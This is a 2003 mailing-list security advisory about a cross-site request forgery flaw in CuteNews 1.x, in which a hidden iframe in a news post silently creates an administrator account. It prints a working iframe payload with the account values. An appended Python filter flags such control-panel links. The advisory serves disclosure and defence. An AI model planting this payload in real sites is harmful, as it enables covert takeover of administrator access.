Vulnwatch mailing list archives

Admin Account Creation Vulnerability in CuteNews 1.x


From: "Peter Winter-Smith" <peter4020 () hotmail com>
Date: Sun, 29 Jun 2003 09:04:58 +0000

Admin Account Creation Vulnerability in CuteNews 1.x

Url: http://www.cutephp.com

CuteNews is an efficient, user-friendly and well designed news system
which is both easy to set up, and doesn't even require SQL to function,
instead creating its own databases.

It supports multiple user levels, such as Journalist (3), Editor (2)
and Administrator (1), and has taken precautions to ensure that
field injection cannot alter the user level, by placing the user level
at the start of the database, rather than after any given field.

It does however allow the minor users to post HTML content in their
posts, which could lead to cross site scripting cookie 'stealing',
but luckily the creator has only stored MD5 hashes of the password,
so that accounts cannot be directly stolen.

It appears however that CuteNews does not filter URLs relating to the
site itself, or rather the CuteNews control panel.

Therefore, if a user was to inject the correct commands into a news
article in a hidden IFRAME, or some such control, then upon the
administrator browsing to the news page after having signed in to
CuteNews the commands would be executed and the administrator would be
none the wiser.

Example:

--------------------------------[Start Post]-------------------------------

Blah, blah, welcome to site.com, etc.

<iframe src="index.php?regusername=owned&regpassword=pass&regnickname=owned&regemail=none () none com&reglevel=1&action=adduser&mod=editusers" height=0 width=0 frameborder=0 scrolling=0></iframe>
---------------------------------[End Post]--------------------------------

If the above data was posted on the news page, the administrator accounts
would be able to execute the command without any notification at all.

That URL in particular adds an administrator account with the username
'owned' and the password 'pass'.

================================================================


Operating system and servicepack level:
Any operating system.


Software:
CuteNews, PHP 4+

Under what circumstances the vulnerability was discovered:
Messing around with CuteNews


If the vendor has been notified:
Yes.


How to contact you for further information:
I can always be reached at peter4020 () hotmail com


Please credit this find to:
Peter Winter-Smith


Thank you for your time,
-Peter
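
The missing filter the advisory describes, posts embedding URLs that point back at the CuteNews control panel, can be expressed as a check run on submitted posts. This is an added example, not part of the original post and not CuteNews code; `SITE_BASE`, the choice of `action`/`mod` as control-panel markers, and the function names are assumptions for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs, urljoin, urlsplit

# Assumptions, not CuteNews code: the URL the post is rendered under, and that
# control-panel requests are recognisable by the "action"/"mod" query parameters.
SITE_BASE = "http://site.example/news/index.php"
PANEL_PARAMS = {"action", "mod"}
URL_ATTRS = {"src", "href", "background", "data"}


class PanelLinkFinder(HTMLParser):
    def __init__(self, base):
        super().__init__(convert_charrefs=True)
        self.base = base
        site = urlsplit(base)
        self.origin = (site.scheme, site.netloc.lower())
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name not in URL_ATTRS or not value:
                continue
            # Resolve relative URLs the way the browser would on the news page.
            target = urlsplit(urljoin(self.base, value.strip()))
            if (target.scheme, target.netloc.lower()) != self.origin:
                continue  # off-site resource, not a request to our own panel
            hit = PANEL_PARAMS & set(parse_qs(target.query, keep_blank_values=True))
            if hit:
                self.findings.append((tag, name, sorted(hit)))


def panel_links(post_html, base=SITE_BASE):
    finder = PanelLinkFinder(base)
    finder.feed(post_html)
    finder.close()
    return finder.findings


# Constructed sample post, same shape as the advisory's example.
SAMPLE_POST = (
    "Blah, blah, welcome to site.example.\n"
    '<img src="http://other.example/logo.png?action=view">\n'
    '<a href="index.php?id=5">older news</a>\n'
    '<iframe src="index.php?mod=editusers&amp;action=adduser" height=0 width=0></iframe>\n'
)

if __name__ == "__main__":
    for tag, attr, params in panel_links(SAMPLE_POST):
        print(f"hold post for review: <{tag} {attr}> targets panel ({', '.join(params)})")
```

A filter like this only narrows what posts can embed; the state-changing request itself still needs to require something a third-party page cannot supply, such as a per-session token.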
